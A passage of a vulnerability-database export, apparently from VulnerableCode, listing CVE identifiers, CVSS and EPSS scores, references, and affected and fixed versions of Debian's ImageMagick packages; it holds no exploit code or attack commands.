vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2005-3582

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dt8r-gjff-pqe4

url VCID-fek5-ee6j-yqhv

vulnerability_id VCID-fek5-ee6j-yqhv

summary ImageMagick: heap-based buffer over-read in GetImageDepth function

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11753.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11753.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-11753

reference_id

reference_type

scores

value	0.00528
scoring_system	epss
scoring_elements	0.67075
published_at	2026-04-01T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67208
published_at	2026-04-26T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67176
published_at	2026-04-21T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67196
published_at	2026-04-24T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67112
published_at	2026-04-02T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67136
published_at	2026-04-04T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67111
published_at	2026-04-07T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.6716
published_at	2026-04-08T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67173
published_at	2026-04-09T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67192
published_at	2026-04-11T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67178
published_at	2026-04-12T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67147
published_at	2026-04-13T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67181
published_at	2026-04-16T12:55:00Z

value	0.00528
scoring_system	epss
scoring_elements	0.67195
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-11753

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.4
scoring_system	cvssv2
scoring_elements	AV:N/AC:L/Au:N/C:P/I:N/A:P

value	8.2
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1477066
reference_id	1477066
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1477066

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-11753

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fek5-ee6j-yqhv

url VCID-fx9z-gbbd-q7aq

vulnerability_id VCID-fx9z-gbbd-q7aq

summary

Multiple vulnerabilities have been found in ImageMagick, the worst
    of which may allow remote attackers to cause a Denial of Service condition.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-12876.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-12876.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-12876

reference_id

reference_type

scores

value	0.00476
scoring_system	epss
scoring_elements	0.64809
published_at	2026-04-01T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64958
published_at	2026-04-26T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64925
published_at	2026-04-21T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64945
published_at	2026-04-24T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.6486
published_at	2026-04-02T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64887
published_at	2026-04-04T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.6485
published_at	2026-04-07T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.649
published_at	2026-04-08T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64915
published_at	2026-04-09T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64932
published_at	2026-04-11T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64922
published_at	2026-04-12T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64894
published_at	2026-04-13T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.6493
published_at	2026-04-16T12:55:00Z

value	0.00476
scoring_system	epss
scoring_elements	0.64941
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-12876

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1487115
reference_id	1487115
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1487115

reference_url	https://security.gentoo.org/glsa/201711-07
reference_id	GLSA-201711-07
reference_type
scores
url	https://security.gentoo.org/glsa/201711-07

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-12876

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fx9z-gbbd-q7aq

url VCID-g1e8-3nnr-gqff

vulnerability_id VCID-g1e8-3nnr-gqff

summary ImageMagick: XML_PARSE_HUGE not properly restricted in coders/svg.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-18853.json

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-18853.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-18853

reference_id

reference_type

scores

value	0.00567
scoring_system	epss
scoring_elements	0.68437
published_at	2026-04-01T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68585
published_at	2026-04-26T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.6854
published_at	2026-04-16T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68553
published_at	2026-04-18T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.6858
published_at	2026-04-24T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68456
published_at	2026-04-02T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68475
published_at	2026-04-04T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68451
published_at	2026-04-07T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68501
published_at	2026-04-08T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68518
published_at	2026-04-09T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68544
published_at	2026-04-11T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.68532
published_at	2026-04-21T12:55:00Z

value	0.00567
scoring_system	epss
scoring_elements	0.685
published_at	2026-04-13T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-18853

reference_url	https://fortiguard.com/zeroday/FG-VD-19-136
reference_id
reference_type
scores
url	https://fortiguard.com/zeroday/FG-VD-19-136

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick/commit/ec9c8944af2bfc65c697ca44f93a727a99b405f1
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/commit/ec9c8944af2bfc65c697ca44f93a727a99b405f1

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1820568
reference_id	1820568
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1820568

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::
reference_id	cpe:2.3:a:imagemagick:imagemagick::::::::
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-18853

reference_id

CVE-2019-18853

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2019-18853

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

